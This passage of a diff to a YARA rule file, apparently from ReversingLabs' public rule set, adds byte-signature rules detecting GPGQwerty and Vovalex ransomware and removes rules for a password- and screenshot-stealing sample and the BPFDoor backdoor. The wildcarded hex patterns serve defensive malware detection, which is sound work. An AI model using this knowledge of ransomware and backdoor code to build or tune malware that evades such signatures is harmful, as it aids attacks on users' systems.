+            4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7
+            ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D
+            4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ??
+            ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D
+            ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8
+            ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ??
+            ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
         }
-		$take_screenshot = {
-            28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 16 16 06 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 06
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files
+}
+rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects GPGQwerty ransomware."
+		author = "ReversingLabs"
+		id = "8848e00a-a695-575b-a29d-fc9521859e12"
+		date = "2020-07-15"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GPGQwerty"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$find_files_p1 = {
+            56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC
+            ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ??
+            66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24
+            ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90
+            89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8
+            ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ??
+            E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ??
+            ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04
+            24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ??
+            31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44
+            04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ??
+            89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B
+            5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? 89 F0 5B 5E C3
         }
-		$get_passwords = {
-            1F ?? 8D ?? ?? ?? ?? 25 16 73 ?? ?? ?? ?? A2 25 17 73 ?? ?? ?? ?? A2 25 18 73 ?? ??
-            ?? ?? A2 25 19 73 ?? ?? ?? ?? A2 25 1A 73 ?? ?? ?? ?? A2 25 1B 73 ?? ?? ?? ?? A2 25
-            1C 73 ?? ?? ?? ?? A2 25 1D 73 ?? ?? ?? ?? A2 25 1E 73 ?? ?? ?? ?? A2 25 1F ?? 73 ??
-            ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 0A 73 ?? ?? ?? ??
-            25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 06 0C 16 0D 2B
-            ?? 08 09 9A 13 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE
-            ?? 09 17 58 0D 09 08 8E 69 32 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 ??
-            ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 02 39 ?? ?? ??
-            ?? 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 6F ??
-            ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D
-            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
-            12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07
+		$find_files_p2 = {
+            8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84
+            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85
+            C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45
+            ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8
         }
-		$process_key_action = {
-            03 28 ?? ?? ?? ?? 2C ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 02 7B ?? ?? ?? ?? 1A
-            8D ?? ?? ?? ?? 25 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ??
-            ?? ?? ?? A2 25 19 07 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ??
-            0C 02 17 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25
-            16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? ?? ?? ?? A2 25 19
-            08 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 02 11 ?? 16 9A A5 ?? ?? ??
-            ?? 11 ?? 17 9A A5 ?? ?? ?? ?? 11 ?? 18 9A A5 ?? ?? ?? ?? 11 ?? 19 9A 74 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 11 ?? 16 9A A5 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 03 04 11 ?? 19 9A 74
-            ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09
-            75 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0A 02 03 04 05 06 28
+		$encrypt_files = {
+            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83
+            C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ??
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8
+            ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? ?? ?? ?? 01 D0 66 C7 00 ?? ??
+            8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $get_tcp_connections ) or ( all of ( $get_operating_system_information_p* ) ) or ( $take_screenshot ) or ( $get_passwords ) or ( $process_key_action ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Linux_Backdoor_Bpfdoor : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects BPFDoor backdoor."
+		description = "Yara rule that detects Vovalex ransomware."
 		author = "ReversingLabs"
-		id = "81e64491-b0fe-5062-86cc-074e05208077"
-		date = "2025-10-13"
-		modified = "2025-10-13"
+		id = "dd4d7969-1afc-5e5d-9324-89f432523173"
+		date = "2021-03-12"
+		modified = "2021-03-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.BPFDoor.yara#L1-L326"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9d3c5408180f5aedca77229c3ecaa499b71530b51d715cb4f35397f0874a84b8"
+		logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "BPFDoor"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Vovalex"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$packet_loop_v1_p1 = {
-            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 D7 48 89 DE 48 89 C1 F3 48 A5 66 C7 85 ?? ?? FF FF
-            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
-            C0 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? BE
-            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 90 48 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48
-            8D 9D ?? ?? ?? ?? 8B 45 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 48 89 DE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48
-            89 45 ?? 48 8B 45 ?? 0F B6 00 0F B6 C0 83 E0 ?? C1 E0 ?? 89 45 ?? 83 7D ?? ?? 7F ??
-            90 EB ?? 48 8B 45 ?? 0F B6 40 ?? 0F B6 C0 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74
-            ?? E9 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45
-            ?? 48 8B 45 ?? 0F B6 40 ?? C0 E8 ?? 0F B6 C0 C1 E0 ?? 89 45 ?? 8B 45 ?? 48 63 D0 8B
-            45 ?? 48 98 48 8D 04 02 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? EB ??
-            48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? EB ?? 48 8B
+		$encrypt_files = {
+            48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ??
+            48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
+            89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48
+            8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48
+            8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ??
+            ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ??
+            ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83
+            EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ??
+            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ??
+            48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D
+            ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ??
+            ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ??
+            ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4
         }
-		$packet_loop_v1_p2 = {
-            45 ?? 48 83 C0 ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
-            84 ?? ?? ?? ?? 48 8B 45 ?? 8B 40 ?? 83 F8 ?? 75 ?? 48 8B 45 ?? 8B 40 ?? 89 45 ?? EB
-            ?? 48 8B 45 ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 45 ??
-            BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 EC 00 00 00
-            00 48 C7 85 70 FC FF FF 00 00 00 00 48 C7 85 78 FC FF FF 00 00 00 00 C7 85 80 FC FF
-            FF 00 00 00 00 C6 85 50 FC FF FF 2F C6 85 51 FC FF FF 75 C6 85 52 FC FF FF 73 C6 85
-            53 FC FF FF 72 C6 85 54 FC FF FF 2F C6 85 55 FC FF FF 6C C6 85 56 FC FF FF 69 C6 85
-            57 FC FF FF 62 C6 85 58 FC FF FF 65 C6 85 59 FC FF FF 78 C6 85 5A FC FF FF 65 C6 85
-            5B FC FF FF 63 C6 85 5C FC FF FF 2F C6 85 5D FC FF FF 70 C6 85 5E FC FF FF 6F C6 85
-            5F FC FF FF 73 C6 85 60 FC FF FF 74 C6 85 61 FC FF FF 66 C6 85 62 FC FF FF 69 C6 85
-            63 FC FF FF 78 C6 85 64 FC FF FF 2F C6 85 65 FC FF FF 6D C6 85 66 FC FF FF 61 C6 85
-            67 FC FF FF 73 C6 85 68 FC FF FF 74 C6 85 69 FC FF FF 65 C6 85 6A FC FF FF 72 C6 85
-            6B FC FF FF 00 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 89 C2 48 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
+		$find_files_p1 = {
+            48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83
+            EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC
+            ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
+            46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
+            C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
+            C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
+            C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D
+            0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ??
+            ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
         }
-		$packet_loop_v1_p3 = {
-            95 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ??
-            ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ??
-            48 89 C7 E8 ?? ?? ?? ?? 89 C1 48 8B 45 ?? 48 83 C0 ?? BA ?? ?? ?? ?? 89 CE 48 89 C7
-            E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C1 48 8B 45 ?? 48
-            83 C0 ?? BA ?? ?? ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 85 C0
-            74 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 8B 40 ?? 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85 ??
-            ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 C7 E8
-            ?? ?? ?? ?? 0F B7 D0 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B
-            45 ?? 0F B7 40 ?? 0F B7 D0 8B 45 ?? 89 D6 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
-            7E ?? 8B 45 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ??
-            0F B7 40 ?? 0F B7 D0 8B 45
+		$find_files_p2 = {
+            89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ??
